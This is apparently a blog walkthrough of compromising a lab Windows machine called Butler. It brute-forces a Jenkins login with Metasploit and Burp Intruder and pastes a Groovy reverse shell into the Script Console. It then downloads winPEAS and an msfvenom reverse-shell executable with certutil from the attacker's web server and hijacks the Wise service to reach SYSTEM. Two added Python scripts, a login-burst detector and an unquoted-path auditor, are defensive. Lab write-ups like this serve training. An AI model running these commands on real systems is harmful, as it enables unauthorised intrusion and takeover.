BUTLER MACHINE EXPLOIT WALKTHROUGH
Babs
Posted on July 13, 2024
This walkthrough showcases a creative approach to exploiting a Windows machine named Butler and gaining access to it.
After successfully setting up your Butler Windows machine, use the following details to log in to the machine.
butler: JeNkIn5@44
administrator: A%rc!BcA!
We can log in using the administrator password A%rc!BcA! to get the IP address of our Butler Windows machine.
After logging in to the Windows machine, we open the command prompt and input the command below to get our IP address:
ipconfig
From the image above, my IP address is "192.168.182.142".
We can start by pinging our Windows machine from Kali to make sure both machines are communicating:
ping 192.168.182.142 -c3
The next step now is to run an Nmap scan using the command:
nmap -p- -A 192.168.182.142
From the above image we can see that port 8080 is open and running an HTTP service, so the next step is to visit the website in our browser using:
192.168.182.142:8080
We landed on a Jenkins login page.
After much enumeration I couldn't find anything, so I searched the web for the Jenkins default password.
I tried the default password and it still failed.
So the next thing left for me is to try a brute-force attack, and for that I want to use Metasploit.
So we open a new tab on our Kali and input the command below to start Metasploit:
msfconsole
Next, we search for the word jenkins using the command:
search jenkins
For me, number 19 is the Jenkins login scanner, shown as "19 auxiliary/scanner/http/jenkins_login".
NB - Your own jenkins_login number might be different, so make sure to use the number shown in your results.
Next, I input the command:
use 19
Then I input the command:
options
My idea was to use the rockyou.txt wordlist for both the username and the password, but it would take hours if not days for the brute-force attack to complete.
So for the options, set the following parameters by inputting the commands:
set username jenkins
set pass_file /usr/share/wordlists/rockyou.txt
set user_as_pass true
set stop_on_success true
set rhosts 192.168.182.142
NB - Basically, what I am trying to do is use the username jenkins as a trial and see whether it gets a successful login using the rockyou.txt password file.
Where there is no username to try, we can use rockyou.txt as the username file as well, but as I said the attack would take hours if not days, so to get the password in good time, make sure to set the username to jenkins.
Now input the command below to make sure everything that was set has been applied and is reflected:
options
Now input the command below to run the module:
run
After the module has run successfully, we can see from the output that the username and password for the Jenkins website are jenkins:jenkins
So both the username and password are the same, which is the case the user_as_pass option tries.
I'd also like to show you how to use Burp Suite for a brute-force attack.
HOW TO USE BURP-SUITE FOR BRUTE FORCE ATTACK
- Search for the FoxyProxy extension in your Firefox browser on Kali and add it to your extensions
- Click on the extension, right-click and select the Manage Extension option
- Click on Proxies and then Add
- Now set the title, type, hostname and port as seen in the image below and then save
Now once you have visited the Jenkins login page, make sure your FoxyProxy extension is switched on.
- Now search for Burp Suite on your Kali and open it
- Press Next
- Start Burp
- Click on Proxy and set Intercept to on
- Remember to make sure that the FoxyProxy extension is on
- Now input a wrong username and password on the Jenkins login page
It will take you straight to Burp and show you a page as seen below
- Right-click and send to Repeater, and also send to Intruder
- From Repeater you can easily change the username and password and then click on Send to check whether the details are correct, but doing this with Repeater will take time.
- So now we switch to Intruder
- Next we double-click on the username hacker and then click on Add
- Then we double-click on the password hacker and then click on Add
The image shows that we have highlighted the two positions that we would like to change
- Next we switch our attack type to Cluster bomb because we want to try all the usernames with all the passwords
- Now click on Payloads
What we are trying to do is guess some usernames and passwords that we would like to use for the brute-force attack
- So we input them as seen in the image below, click on Add, and keep adding as many as we want to.
- Then we switch to payload set 2 as seen in the image below and input the passwords we would like to try.
- Click on Start attack
- Notice that in the responses the status code is the same every time, so what we mainly focus on is the length. From the image below we can see a big difference in the length for jenkins-jenkins. That difference is an indication that something is different, so we try that username and password on the Jenkins page.
NB - Make sure to turn off Burp Suite and FoxyProxy
Now we go back to our Jenkins login page and input jenkins as both the username and the password
We have successfully logged in.
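Both brute-force runs above (the Metasploit jenkins_login module and Burp Intruder) look the same from the server side: a burst of login POSTs from one source. The following Python detector is an added example, not part of the original walkthrough; the combined access-log format, the /j_spring_security_check login path and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumptions (not from the walkthrough): a proxy in front of Jenkins writes
# combined-format access logs, and the login form posts to one of these paths.
LOGIN_PATHS = ("/j_spring_security_check", "/j_acegi_security_check")
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def sample_log():
    """Constructed log: six login POSTs from the Kali address in five seconds,
    plus one ordinary login from another host."""
    post = '{ip} - - [13/Jul/2024:10:00:{s:02d} +0000] "POST /j_spring_security_check HTTP/1.1" 302 0'
    rows = [post.format(ip="192.168.182.129", s=s) for s in range(6)]
    rows.append(post.format(ip="192.168.182.50", s=3))
    rows.append('192.168.182.50 - - [13/Jul/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 14211')
    return rows

def find_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: peak login POSTs inside any sliding window} for every
    source that reaches `threshold`. The status code is ignored on purpose:
    as the Intruder results show, failed and successful logins return the same
    status, so the request rate is the usable signal."""
    recent = defaultdict(deque)   # source ip -> timestamps still inside the window
    peak = defaultdict(int)       # source ip -> largest window count seen so far
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith(LOGIN_PATHS):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:   # drop attempts that fell out of the window
            q.popleft()
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

if __name__ == "__main__":
    for ip, n in find_login_bursts(sample_log()).items():
        print(f"{ip}: {n} login attempts within 60s")
```

Pairing an alert like this with account lockout or rate limiting, and rejecting passwords equal to the username, closes the jenkins:jenkins case shown above.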
Now we need to find a place where we can get code execution.
For that, click on Manage Jenkins
And then click on Script Console
The script console seems to use Groovy
Search Google for groovy reverse shell and select the one from GitHub as seen in the image below
Now click on Raw and copy all
Now paste it into the script console
The reverse shell script uses port 8044, so we set up a listener using the command:
nc -nvlp 8044
Now we need to change the local host in the script to our attacking machine's IP address
Now click on Run
We have successfully popped a shell
Input the command below to find out who we are on the system
whoami
From the image above, we can see that we are butler and not a system admin, so we need to do some privilege escalation.
For this we will use a tool called winPEAS
It is a privilege escalation tool for Windows.
Search Google for winPEAS
Select the one seen in the image above
Then select the winPEASexe file
Scroll down and click on download the latest
Click on winPEASx64
Once you have successfully downloaded it, it should be in your Downloads directory.
Now that it has been downloaded, we need to host a web server and then fetch the file from the shell we popped
To do that, input the command below in your Downloads directory:
python3 -m http.server 80
Then, in the tab where we popped a shell, we need to go into a directory where we know we have read and write permission.
So input the command:
cd c:\users
Input the command:
dir
Now input the command:
cd butler
We will put winPEAS here because it is butler's home directory and we should have higher permissions in this directory.
So to put the file here, input the command:
certutil.exe -urlcache -f http://192.168.182.129/winPEASx64.exe winpeas.exe
The file should have downloaded successfully and be named winpeas.exe on the Windows system
Input the command below to find the file:
dir
Now we need to run winPEAS, and to do that we input the command:
winpeas.exe
For this particular exploit, we are interested in finding out which services are running on the system, so scroll down to the service information found by winPEAS
The image above shows some of the services running on the Butler Windows machine.
Out of all the services running, wiseboot is the one we are interested in.
The next step is to generate some malware. We could use Metasploit to do that, but for this exploit we will do it manually using the command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.182.129 LPORT=7777 -f exe > wise.exe
NB - Make sure to change the LHOST to your Kali's IP address.
Once the malware has been generated, we need to host a web server and fetch the file from the Windows tab in which we popped the shell
The image above shows that I generated the malware in my Downloads directory, so I will host the web server there using the command:
python3 -m http.server 80
NB - Make sure you have cancelled the web server we were previously hosting.
Use Ctrl+C to cancel the previous one if you haven't
If yours is still running from the first time we hosted it and you do not wish to cancel it, then leave it running, do not re-host it, and just input the command to receive the wise.exe file on the Windows machine.
Next we need to open a new tab and listen on port 7777, because that is the port we plan on using for the exploit. For that we use the command:
nc -nvlp 7777
Now we need to cd into the Wise directory, so for that input the commands:
cd c:\
dir
Then we need to go into the Program Files (x86) directory, so input the command:
cd Program Files (x86)
Now cd into Wise using the command:
cd Wise
Now we want to put the wise.exe file here, so we input the command:
certutil -urlcache -f http://192.168.182.129/wise.exe wise.exe
Once it has been successful, input the command below to confirm:
dir
We first need to stop the service that's running as wisebootassistant, because if we don't, we might pop a shell back as butler instead of system admin. To stop the service, input the command:
sc stop wisebootassistant
To confirm that the service has stopped, input the command:
sc query wisebootassistant
Now we need to start it using the command:
sc start wisebootassistant
We have successfully popped a shell as system.
Input the command below to confirm:
whoami
Then input the command below to get the system info:
systeminfo
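The walkthrough does not say why the Wise service stands out; the steps (an executable named wise.exe dropped into C:\Program Files (x86)\Wise, then a service restart) fit a service whose executable path contains spaces and is not quoted. Assuming that is the weakness, the following added example (not from the original post) audits "sc qc"-style output for such paths and lists the earlier executables Windows would try before the intended one; the sample output and its paths are constructed.

```python
import re

# Constructed "sc qc"-style output. The service name WiseBootAssistant comes
# from the walkthrough; every path here is illustrative, not read from the lab VM.
SAMPLE_SC_QC = r'''
SERVICE_NAME: WiseBootAssistant
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wise\Wise Example App\Service.exe
SERVICE_NAME: QuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Quoted App\svc.exe" -run
SERVICE_NAME: NoSpaceSvc
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
'''

# Everything up to the first ".exe" is the executable; the rest is arguments.
EXE = re.compile(r"^(.*?\.exe)\b", re.IGNORECASE)

def earlier_candidates(image_path):
    """For an unquoted path containing spaces, return the executables Windows
    would try first (CreateProcess splits an unquoted command line at each
    space and appends .exe). An empty list means the path is unambiguous."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    m = EXE.match(path)
    exe = m.group(1) if m else path
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def audit(sc_qc_text):
    """Map service name -> earlier candidate executables for every service
    whose BINARY_PATH_NAME is unquoted and contains spaces."""
    findings, name = {}, None
    for line in sc_qc_text.splitlines():
        key, _, value = line.strip().partition(":")
        key, value = key.strip(), value.strip()
        if key == "SERVICE_NAME":
            name = value
        elif key == "BINARY_PATH_NAME" and name:
            hits = earlier_candidates(value)
            if hits:
                findings[name] = hits
    return findings

if __name__ == "__main__":
    for service, paths in audit(SAMPLE_SC_QC).items():
        print(service, "->", paths)
```

The fix is to wrap the service's executable path in quotes and to make sure standard users cannot write to any directory the listed candidates fall in.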
MAJOR PROBLEM YOU MIGHT FACE WHILE EXPLOITING THIS MACHINE
For some reason the machine keeps shutting down, so whenever it shuts down, make sure to turn it back on.
GOOD LUCK!!!